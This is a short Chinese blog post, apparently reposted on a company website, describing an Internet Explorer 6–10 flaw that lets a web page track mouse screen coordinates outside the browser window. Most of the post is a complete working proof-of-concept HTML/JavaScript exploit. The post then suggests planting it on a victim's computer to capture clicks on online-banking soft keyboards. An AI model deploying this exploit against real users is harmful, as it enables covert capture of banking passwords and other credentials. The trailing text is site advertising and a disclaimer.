IE浏览器鼠标坐标跟踪安全风险,通杀全版本

刚在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置，即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。

影响版本:IE6-10

测试：

在系统目录下新建一个html文件，代码如下：

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent("onload", function() {
      var detector = document.getElementById("detector");
      detector.attachEvent("onmousemove", function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      setInterval(function () {
        detector.fireEvent("onmousemove");
      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>

用IE打开新建的html文件

试想将该漏洞上传到别人的电脑对方还使用网银，以为软键盘就安全了，测试后发现不以为然。

网页题目：IE浏览器鼠标坐标跟踪安全风险,通杀全版本
文章来源：https://www.cdcxhl.com/article46/pjiheg.html

成都网站建设公司_创新互联，为您提供移动网站建设、网站营销、网站设计、搜索引擎优化、网站建设、Google

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联